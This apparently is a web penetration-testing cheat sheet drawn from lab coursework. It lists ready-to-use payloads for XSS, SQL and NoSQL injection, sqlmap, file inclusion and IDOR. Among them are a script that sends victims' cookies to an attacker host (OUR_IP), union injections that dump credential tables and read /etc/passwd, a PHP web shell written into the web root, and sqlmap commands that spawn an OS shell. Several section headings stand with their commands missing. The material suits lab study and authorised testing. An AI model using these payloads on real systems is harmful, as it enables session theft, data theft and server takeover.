Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
<script>alert(window.origin)</script>
Basic XSS Payload
<plaintext>
Basic XSS Payload
<script>print()</script>
Basic XSS Payload
<img src="" onerror=alert(window.origin)>
HTML-based XSS Payload
<script>document.body.style.background = "#141d2b"</script>
Change Background Color
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
Change Background Image
<script>document.title = 'HackTheBox Academy'</script>
Change Website Title
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>
Overwrite website's main body
<script>document.getElementById('urlform').remove();</script>
Remove certain HTML element
<script src="http://OUR_IP/script.js"></script>
Load remote script
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
Send Cookie details to us
<iframe src=file:///C:/windows/win.ini>
Load remote ini file via iframe tag
Login Form Injection
curl -isk "https://site.com"
Test for status of Content Security Policy
Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>Sample XSS Polyglot
How to perform basic Login Form Injection via Reflected XSS
Step 1: Test vulnerable form for the remove function by running script in console (Dev-Tools)
Step 2: Inject form into webpage with XSS payload by executing the below script into console (Dev-tools)
After successfully authenticating to a SQL Server It is worth a shot to verify if xp_cmdshell has been previously activated with:\
If xp_cmdshell has not been activated, run the below commands to activate and utilize Windows XP cmd commands within SQL:
Basic SQL Testing
SELECT
Select data from database
FROM
Specify table to retrieve data
WHERE
Filter query to match a given condition
INSERT
Add single row to table
CREATE
Used to Create a TABLE, DATABASE, INDEX or VIEW
ALTER TABLE
Add/Remove columns from a table
UPDATE
Update table data
DELETE
Delete rows from table
AS
Used to rename column/table with alias
JOIN
Combine rows from 2 or more tables
AND
Combine query conditions (must meet all conditions)
OR
Combine query conditions. (only one must be met)
LIMIT
Limit the amount of rows returned
IN
Specify multiple values (only used with WHERE)
CASE
Return value on a specified condition
IS NULL
Return only rows with a NULL value
LIKE
Search for pattern in a column
COMMIT
Write a transaction to the database
ROLLBACK
Undo a transaction
DROP
Delete TABLE, DATABASE or INDEX
GROUP BY
Group data into logical sets
ORDER BY
Set order of results
HAVING
Functions like WHERE but filters groups
COUNT
Count rows
SUM
Return a sum of a column
AVG
Return average of a column
MIN
Return min value of a column
MAX
Return max value of a column
MySQL Basics
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p
login to mysql database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List available tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns in a table
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output
SELECT * FROM logins ORDER BY column_1
Sort by column
SELECT * FROM logins ORDER BY column_1 DESC
Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by two-columns
SELECT * FROM logins LIMIT 2
Only show first two results
SELECT * FROM logins LIMIT 1, 2
Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>
List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'
List results where the name is similar to a given string
MySQL Operator Precedence
Division (
/), Multiplication (*), and Modulus (%)Addition (
+) and Subtraction (-)Comparison (
=,>,<,<=,>=,!=,LIKE)NOT (
!)AND (
&&)OR (
||)
SQL Injection
Auth Bypass
admin' or '1'='1
Basic Auth Bypass
admin')-- -
Basic Auth Bypass With comments
Union Injection
' order by 1-- -
Detect number of columns using order by
cn' UNION select 1,2,3-- -
Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection for 4 columns
DB Enumeration
SELECT @@version
Fingerprint MySQL with query output
SELECT SLEEP(5)
Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -
Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -
Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Write a web shell into the base web directory
NoSQL Basics
show dbs;
List all the databases present
use user_creds;
Switch to database named "user_creds"
show collections;
List out the collections in a database
db.flag.find().pretty()
Dump the contents of the documents present in the flag collection
http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
Basic NoSQLi Login
SQLmap
sqlmap -h
View the basic help menu
sqlmap -hh
View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
POST request specifying an injection point with an asterisk
sqlmap -r req.txt
Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=abcdefghijklmnop'
Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT
Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5
Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user
Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Anti-CSRF token bypass
sqlmap --list-tampers
List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell
Spawning an OS shell
WAF BYPASSES
Passwords
LFI workaround PoC
LFI via this path does not work at first
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing character with ? you may receive a successful response (200)
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
Fuzzing Parameters
LFI Wordlists
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
Local File Inclusion (LFI)
Basic Bypasses
PHP Filters
PHP Wrappers
Data Wrapper
The data wrapper is only available to use if the (allow_url_include) setting is enabled in the PHP configurations.
Input Wrapper
Must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting
Expect Wrapper
Remote File Inclusion (RFI)
LFI & File Uploads
Image Upload
ZIP Upload
PHAR Upload
Log Poisoning
PHP Session Poisoning
Server Log Poisoning
File Inclusion Parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Find and replace
IDsin urls, headers and body :/users/01=>/users/02Try Parameter Pollution:
users=01=>users=01&users=02Special Characters:
/users/01*or/users/*=> Disclosure of every single userTry Older versions of API endpoints:
/api/v3/users/01=>/api/v1/users/02Add extension:
/users/01=>/users/02.jsonChange Request Methods: POST /users/01 =>
GET, PUT, PATCH, DELETE, OPTIONS,etcCheck if Referer or other Headers are used to validate
IDs:Encrypted IDs: If application is using encrypted IDs, try to decrypt using hashing/cracking tool
Send wildcard
{""user_id"":""*""}Send ID twice
URL?id=&id=JSON wrap {“id”:111} -->
{“id”:{“id”:111}}Wrap ID with an array {“id”:111} -->
{“id”:[111]}Swap GUID with Numeric ID or email:
/users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX=>/users/02or/users/a@b.comTry GUIDs such as:
00000000-0000-0000-000000000000and11111111-1111-1111-111111111111GUID Enumeration: Try to disclose GUIDs using
Google Dorks,Github,Wayback,Burp historyIf none of the GUID Enumeration methods work then try:
SignUp,Reset Password, andother endpointsand analyze the responses. An endpoint may disclose user's GUID within the application.When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: Look for endpoints/features that may disclose information
Chain IDOR with XSS for Account Takeovers\
Last updated